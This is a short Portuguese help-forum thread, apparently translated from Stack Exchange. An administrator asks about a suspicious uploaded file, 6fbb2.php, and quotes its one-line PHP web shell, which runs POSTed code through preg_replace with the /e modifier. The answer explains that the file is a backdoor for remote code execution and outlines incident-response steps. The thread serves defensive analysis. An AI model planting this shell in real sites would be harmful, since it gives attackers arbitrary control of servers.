Unknow arquivo PHP enviado para o servidor EEC4D8E4439299046B8CDB3F782? php @preg_replace (“/ [pageerror] / e”, $ _ POST ['xbfk'], “saft”); ?

1

Acabei de descobrir que alguém enviou um arquivo PHP para nosso aplicativo hospedado em um servidor Linux compartilhado, com o nome 6fbb2.php e este é o conteúdo do arquivo:

EEC4D8E4439299046B8CDB3F782<?php @preg_replace("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>

Alguém tem uma idéia de qual é a finalidade desse arquivo? e o que devo fazer?

    
por Towerss 02.08.2018 / 10:32

1 resposta

2

O objetivo do arquivo é deixe alguém executar código arbitrário em seu servidor por HTTP .

O que você deve fazer é fechar imediatamente o acesso ao site, e o resto do servidor, se puder, encontrar backups verificáveis de antes do compromisso para restaurar, examine tudo com extremo cuidado para descobrir o que mais eles fizeram, e como eles entraram em primeiro lugar para que você possa consertar isso antes de colocar qualquer coisa ao vivo novamente.

Veja também: Como faço para lidar com um servidor comprometido ? no Security SE.

    
por 02.08.2018 / 10:41

Tags